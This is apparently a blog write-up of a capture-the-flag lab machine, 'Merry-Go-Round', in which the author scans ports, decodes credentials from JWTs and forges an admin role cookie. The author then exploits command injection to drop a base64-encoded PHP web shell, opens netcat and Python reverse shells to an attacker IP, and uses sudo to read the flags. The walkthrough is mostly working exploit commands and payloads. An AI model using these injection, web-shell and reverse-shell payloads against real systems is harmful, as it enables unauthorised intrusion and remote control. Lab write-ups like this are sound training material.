ptd-Merry-Go-Round

E:\PENTEST\NMAP>

nmap -p- 10.150.150.100

Starting Nmap 7.70 ( https://nmap.org ) at 2021-02-19 15:38 W. Europe Standard Time
Stats: 0:00:28 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 72.50% done; ETC: 15:38 (0:00:05 remaining)
Nmap scan report for 10.150.150.100
Host is up (0.030s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
5000/tcp open upnp
8131/tcp open indigo-vbcp
8148/tcp open isdd
8154/tcp open unknown
8169/tcp open unknown
8214/tcp open unknown
8422/tcp open unknown
8600/tcp open asterix
8795/tcp open unknown
8971/tcp open unknown
8984/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 34.23 seconds

E:\PENTEST\NMAP>

curl http://10.150.150.100:8131

>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiaXRzbWUiLCJwYXNzIjoiMmMxN2M2MzkzNzcxZWUzMDQ4YWUzNGQ2YjM4MGM1ZWMifQ.7mndOl98wTtLrPLZN_69UwY4e2sY_lmy_3tSiF3bTkU
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8148
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8148
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8148
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8148
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8148
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>

curl http://10.150.150.100:8148/

>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoicmljaGFyZCIsInBhc3MiOiI3NzY4NjE3NDZFNkY3NCJ9.e_FDTScd6anuQyWH7sCetjCqjTjvsi_9Sk5d1-vcU_4
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>

curl http://10.150.150.100:8154/

>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoibG9va2hlcmUiLCJwYXNzIjoiZjUyY2FlN2Q2NzdmZDhhODNhYzdjYzQ0MDZjMWQwNzNhNjlhN2IyMyJ9.V1ERq4lFaEr_U9vdE1n43uq-cP5zS8EKaRJKfvhaOjY
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8169
>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWRtaW5pc3RyYXRvciIsInBhc3MiOiJqdXBpdGVyIn0.4dA5aV12WciBnX_53pR_Zs0q1FdCwqMBjaRvWMKJlB8
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8214/
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>

curl http://10.150.150.100:8214/

>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiaG9uZXkiLCJwYXNzIjoiMzdjNjA3MTE5OWZjMGQ1NGM3ODA0ZjRlZTY3ZTBiZTFmZjQ5MGUwOWE3MzE2ZWIyMDJmODE4ZDcwOTk1MjU3MGYzMGVmYjE1ZjMwMGQ1ZTYwNmMxZjAxMjdlMTNiMTkwODU0Y2UyMjFkNjllYjg3OTBhZjI4YTQ0NjNmYTZiODEifQ.B7oIwzKMDvqASNqGMeCF65oD8JARDh1rGrR26j6QQE4
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>

curl http://10.150.150.100:8422/

>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoibG9va2hlcmUiLCJwYXNzIjoiYTk0YThmZTVjY2IxOWJhNjFjNGMwODczZDM5MWU5ODc5ODJmYmJkMyJ9.5fM1qeavBWXL2_DzbpJD9pPAHsuoKaH6h4WLGEKPCtg
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8600/
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8600/
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>

curl http://10.150.150.100:8600/

>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWRtaW5pc3RyYXRvciIsInBhc3MiOiJiYW5hbmEifQ.7jqCMA8wLvqFf_B_K7xLpJ6HFHUFBtYZjZgKbL__Euk

E:\PENTEST\NMAP>curl http://10.150.150.100:8795/
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8795/
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>

curl http://10.150.150.100:8795/

>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiam9obiIsInBhc3MiOiJVRTlxZG5JNFVrcDNlSGQxYWt0VFpRbz0ifQ.KnkALx296Nb4Y-2JzTvbK2IedamG7gp_TpKb36WFqhI
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>

.

{"typ":"JWT","alg":"HS256"}.{"user":"richard","pass":"776861746E6F74"}.e_
{"typ":"JWT","alg":"HS256"}.{"user":"administrator","pass":"jupiterIn0.áÐ9i]vYÈ
{"typ":"JWT","alg":"HS256"}.{"user":"honey","pass":"37c6071199fc0d54c7804f4ee67e0be1ff490e09a7316eb202f818d709952570f30efb15f300d5e606c1f0127e13b190854ce221d69eb8790af28a4463fa6b81"
{"typ":"JWT","alg":"HS256"}.{"user":"administrator","pass":"banana"fQ.î:
{"typ":"JWT","alg":"HS256"}.{"user":"john","pass":"UE9qdnI4Ukp3eHd1aktTZQo="fQ.*y
=> nog een keer decode => POjvr8RJwxwujKSe 
=> login

john / POjvr8RJwxwujKSe

 gives FLAG73=26ABDA36DFAE4CBA32ADB2DD5B53EFCFC60875C4
http://10.150.150.100:5000/landing

view-source:http://10.150.150.100:5000/static/door-lib-version1.2.min.js





puckiestyle, [22.02.21 13:37]
hoi Jonne, ik heb het java script [ http://10.150.150.100:5000/static/door-lib-version1.2.min.js ] bekeken met een beautifier , wel gevonden sha256("username:user") & sha256("username:admin") op console.log , maar geen idee hoe dit toe te passen,

Jonne, [22.02.21 13:39]
Je kunt een cookie maken met sha256("john:admin")

Jonne, [22.02.21 13:39]
curl -i --cookie "role=b7ea426b84a5a44ddeabcd2cdc0f6e42a4fd65be4756beeb5ebeb5cc73c23c06" 'http://10.150.150.100:5000/landing'

Jonne, [22.02.21 13:41]
<h1> Welcome Admin! </h1>
<!-- Open sesame! -->


.


curl -i --cookie "role=b7ea426b84a5a44ddeabcd2cdc0f6e42a4fd65be4756beeb5ebeb5cc73c23c06" 'http://10.150.150.100:5000/landing'

</html>┌─[user@parrot-virtual]─[~/ptd]
└──╼ $curl -i --cookie "role=b7ea426b84a5a44ddeabcd2cdc0f6e42a4fd65be4756beeb5ebeb5cc73c23c06" 'http://10.150.150.100:5000/landing'
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 574
Server: Werkzeug/1.0.1 Python/3.6.9
Date: Mon, 22 Feb 2021 13:50:00 GMT

<!DOCTYPE html>
<html>
<head>
<title>Index</title>
</head>
<body>

<p>FLAG74=BCE09F9895DED436359E935D0F77B1CDAE3CBC02</p></br>
<h1> Welcome Admin! </h1>

<!-- Open sesame! -->

<form action="/landing" method="post">
<div class="container">
<label for="target"><b>IP</b></label>
<input type="text" placeholder="Enter IP Address" name="target" autocomplete="off" required>
<button type="submit">Check</button>
</br>
<h3> Connectivity Result: </h3></br>

</div>

<div class="container" style="background-color:#f1f1f1">

</div>
</form> 
</body>
</html>┌─[user@parrot-virtual]─[~/ptd]
└──╼ $


rm -f /tmp/p; mknod /tmp/p p && nc 10.66.66.42 4444 0/tmp/p


curl -i –cookie “role=b7ea426b84a5a44ddeabcd2cdc0f6e42a4fd65be4756beeb5ebeb5cc73c23c06” ‘http://10.150.150.100:5000/landing’ -d ‘target=10.66.66.18; echo “PD9waHAKICAgIGlmKGlzc2V0KCRfR0VUWydjbWQnXSkpCiAgICB7CiAgICAgICAgc3lzdGVtKCRfR0VUWydjbWQnXSk7CiAgICB9CgoK” | base64 -d > /var/www/html/shell.php’


http://10.150.150.100/shell.php?cmd=whoami


python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.66.66.42”,80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’


┌─[user@parrot-virtual]─[~/ptd/merry-go-round]
└──╼ $


sudo nc -nlvp 80


[sudo] password for user: 
listening on [any] 80 ...
connect to [10.66.66.42] from (UNKNOWN) [10.150.150.100] 46010
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(happy) gid=1000(happy) groups=1000(happy),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
$


whoami


happy
$


sudo /bin/sh


cat flag75.txt
FLAG75=384FA60682220A6AAA314E6A03059215D34A2225
cat flag76.txt
FLAG76=342E17655889D42D4B90E3985BFFB53E6D2EE36F


.


Author : Puckiestyle


 


 


 


 

	


	

		Author Posted on 			







	
	
		

		
Leave a Reply 
Your email address will not be published. Required fields are marked *